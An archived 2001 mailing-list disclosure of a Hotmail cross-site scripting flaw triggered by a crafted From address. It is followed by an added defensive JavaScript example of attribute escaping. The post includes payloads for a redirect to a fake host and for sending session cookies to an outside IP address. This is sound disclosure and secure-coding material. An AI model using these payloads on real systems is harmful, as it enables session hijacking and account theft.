Vulnerability Development mailing list archives

hotmail+javascript


From: ObLiviON <v_arnhem () dds nl>
Date: Mon, 10 Sep 2001 17:27:55 +0200

You can bypass the Hotmail JavaScript 'filtering' system using the
from-address.
I used Netscape Messenger and set my email address to
"a background=javascript:alert('test') @hotmail.com" (without quotes),
then Netscape sends it as "user"@domain.

The from-address is used by Hotmail as the name of the cell for the
message link etc.

--> From my Hotmail inbox page:

<td name=""a background=javascript:alert('test') "@hotmail.com">

and the JavaScript code is executed.
And it's executed on the inbox page = extra fun :)
---

"a background=javascript:location.href='fake.hotmail.bla.com'
@hotmail.com"
"a
background=javascript:document.images[1].src='http://123.12.123.2/cgi-bin/bla.cgi?'+document.cookie+location.href
@hotmail.com"

etc... :)

grtz ObLiviON
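
Added example, not part of the original post and not Hotmail's code: a constructed model of the inbox cell, showing why the quoted local part closes the name attribute early and how encoding the value on output keeps it a single attribute. The function names and the small tokenizer are assumptions made for illustration.

```javascript
// Constructed input: the From address in the "user"@domain form quoted in the post.
const FROM = `"a background=javascript:alert('test') "@hotmail.com`;

// Vulnerable rendering: the address is concatenated into a quoted attribute
// without encoding, which reproduces the <td> markup shown in the post.
function renderCellUnsafe(from) {
  return `<td name="${from}">`;
}

// Hardened rendering: encode every character that can end or restructure an
// attribute value, so the whole address stays inside name="...".
function escapeAttr(value) {
  return String(value).replace(/[&<>"'`=]/g, (c) => `&#${c.charCodeAt(0)};`);
}

function renderCellSafe(from) {
  return `<td name="${escapeAttr(from)}">`;
}

// Small tokenizer for one start tag (assumption: it approximates how a lenient
// HTML parser splits attributes; it is not a full HTML parser).
function attributeNames(tag) {
  const inner = tag.replace(/^<\w+\s*/, '').replace(/>$/, '');
  const re = /([^\s"'=<>\/]+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+))?/g;
  const names = [];
  let m;
  while ((m = re.exec(inner)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// Regression check for a template: any attribute other than the one the
// template intended means the value escaped its attribute.
function injectedAttributes(tag, intended = ['name']) {
  return attributeNames(tag).filter((n) => !intended.includes(n));
}

console.log(renderCellUnsafe(FROM));
console.log(injectedAttributes(renderCellUnsafe(FROM)));
console.log(renderCellSafe(FROM));
console.log(injectedAttributes(renderCellSafe(FROM)));
```
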


